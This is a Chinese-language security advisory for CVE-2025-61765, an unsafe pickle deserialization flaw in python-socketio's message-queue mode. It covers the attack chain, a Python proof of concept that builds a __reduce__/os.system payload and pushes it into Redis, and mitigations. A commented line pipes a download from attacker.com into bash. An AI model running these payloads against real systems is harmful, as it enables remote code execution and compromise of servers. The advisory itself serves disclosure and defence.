CVE-2025-61765 python-socketio消息队列反序列化远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-61765

漏洞类型

远程代码执行（RCE）/不安全反序列化

CVSS评分

6.4 中危

攻击向量

邻接 (AV:A)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

python-socketio

漏洞概述

CVE-2025-61765是python-socketio（Socket.IO实时客户端和服务器的Python实现）中存在的一个远程代码执行（RCE）漏洞，影响5.14.0之前的版本。该漏洞源于python-socketio在多服务器部署中使用消息队列（如Redis）进行服务器间通信时，消息采用Python的`pickle`模块进行编码。当Socket.IO服务器接收到来自消息队列的此类消息时，会假定其为可信消息并立即进行反序列化操作。攻击者在已经获取消息队列访问权限的前提下，可以向python-socketio服务器发送精心构造的pickle负载，利用Python的`__reduce__`方法在反序列化过程中执行任意代码。该漏洞仅影响消息队列已被入侵的部署场景，攻击者可在Socket.IO服务器进程的上下文和权限下执行任意代码。单服务器系统（不使用消息队列）以及使用安全消息队列的多服务器系统不受此漏洞影响。该漏洞由Bluerock安全团队发现并报告，CVSS评分为6.4，攻击向量为邻接网络（AV:A），需要高权限（PR:H），无需用户交互（UI:N），对机密性和完整性影响为高，对可用性影响为低。

技术细节

python-socketio在多服务器部署架构中，为了实现服务器实例之间的通信和事件分发，支持使用外部消息队列后端（如Redis、RabbitMQ等）。在这些部署模式下，服务器之间传递的消息使用Python内置的`pickle`模块进行序列化和反序列化。

漏洞的核心技术原理在于Python的`pickle`模块本身存在安全风险：`pickle.loads()`函数在反序列化过程中可以执行任意Python代码。攻击者可以通过构造特殊的pickle对象，利用Python对象的`__reduce__`方法指定在反序列化时调用的函数及其参数。当服务器调用`pickle.loads()`处理来自消息队列的消息时，恶意代码将被自动执行。

利用条件与流程：
1. 目标系统必须采用多服务器部署架构，并配置了消息队列后端（如Redis）；
2. 攻击者必须首先获取消息队列的访问权限（例如通过Redis未授权访问、弱口令或其他方式入侵消息队列服务器）；
3. 攻击者向消息队列中注入恶意的pickle序列化数据；
4. python-socketio服务器从消息队列中读取该消息并调用`pickle.loads()`进行反序列化；
5. 在反序列化过程中，`__reduce__`方法被触发，导致任意Python代码执行。

该漏洞的修复方案是在5.14.0版本中移除`pickle`模块的使用，改用更安全的JSON编码格式进行服务器间消息传递。

攻击链分析

STEP 1

步骤1：初始入侵

攻击者首先通过其他攻击手段（如Redis未授权访问、弱口令爆破、供应链攻击等）获取python-socketio部署中消息队列（Redis等）的访问权限。

STEP 2

步骤2：构造恶意payload

攻击者利用Python pickle模块的`__reduce__`方法构造恶意的序列化负载，该负载在反序列化时将执行任意Python代码（如反弹shell、系统命令执行等）。

STEP 3

步骤3：注入恶意消息

攻击者将恶意pickle负载通过Redis的LPUSH或PUBLISH命令注入到python-socketio服务器监听的队列或频道中。

STEP 4

步骤4：触发反序列化

python-socketio服务器从消息队列中读取该消息，调用`pickle.loads()`进行反序列化，假定消息可信。

STEP 5

步骤5：远程代码执行

在反序列化过程中，`__reduce__`方法被自动调用，触发恶意代码执行，攻击者在Socket.IO服务器进程的上下文和权限下获得代码执行能力。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61765 PoC - Malicious pickle payload for python-socketio RCE
# This payload demonstrates how an attacker with access to the message queue
# can craft a pickle payload to achieve RCE when deserialized by python-socketio server

import pickle
import os

class MaliciousPicklePayload:
    """
    Crafted pickle payload that exploits CVE-2025-61765.
    When python-socketio server calls pickle.loads() on this payload,
    arbitrary code will be executed via the __reduce__ method.
    """
    def __reduce__(self):
        # Command to execute on the target server
        # In real attack scenario, this could be reverse shell, data exfiltration, etc.
        command = "id > /tmp/pwned.txt"
        return (os.system, (command,))

def generate_malicious_payload(command="id > /tmp/pwned.txt"):
    """
    Generate a malicious pickle payload to be injected into the message queue
    (e.g., Redis) that python-socketio servers consume.
    """
    class Exploit:
        def __reduce__(self):
            return (os.system, (command,))
    
    payload = pickle.dumps(Exploit())
    return payload

def simulate_attack():
    """
    Simulate the attack scenario:
    1. Attacker gains access to Redis message queue
    2. Attacker injects malicious pickle payload into the queue
    3. python-socketio server consumes the message and deserializes it
    4. Arbitrary code execution occurs
    """
    # Step 1: Generate malicious payload
    malicious_payload = generate_malicious_payload("whoami > /tmp/rce_result.txt")
    print(f"[*] Generated malicious pickle payload ({len(malicious_payload)} bytes)")
    
    # Step 2: In a real scenario, inject into Redis:
    # import redis
    # r = redis.Redis(host='target-redis-host', port=6379)
    # r.lpush('socketio_queue', malicious_payload)
    print("[*] Payload would be injected into Redis queue")
    
    # Step 3: Demonstrate deserialization (what happens on server side)
    print("[*] Simulating server-side pickle.loads() call...")
    try:
        result = pickle.loads(malicious_payload)
        print(f"[!] Code executed! Result: {result}")
    except Exception as e:
        print(f"[*] Deserialization result: {e}")
    print("[*] Check /tmp/rce_result.txt for evidence of code execution")

if __name__ == "__main__":
    simulate_attack()

# Example: Injecting into Redis message queue used by python-socketio
# The python-socketio server uses Redis lists/pubsub for inter-server communication
# When it receives a message, it calls pickle.loads() on the data
#
# import redis
# r = redis.Redis(host='vulnerable-redis', port=6379, password='compromised_password')
# payload = generate_malicious_payload("curl http://attacker.com/shell.sh | bash")
# r.lpush('socketio', payload)  # or r.publish('socketio-channel', payload)

影响范围

python-socketio < 5.14.0

防御指南

临时缓解措施

在无法立即升级的情况下，应采取以下临时缓解措施：1）立即加固消息队列的安全配置，包括启用认证、修改默认端口、限制网络访问；2）检查消息队列中是否存在异常或可疑的序列化数据；3）考虑临时将多服务器部署切换为单服务器模式（不使用消息队列）；4）监控Socket.IO服务器进程的异常行为，如异常网络连接、未知子进程等；5）尽快升级到python-socketio 5.14.0或更高版本以彻底修复该漏洞。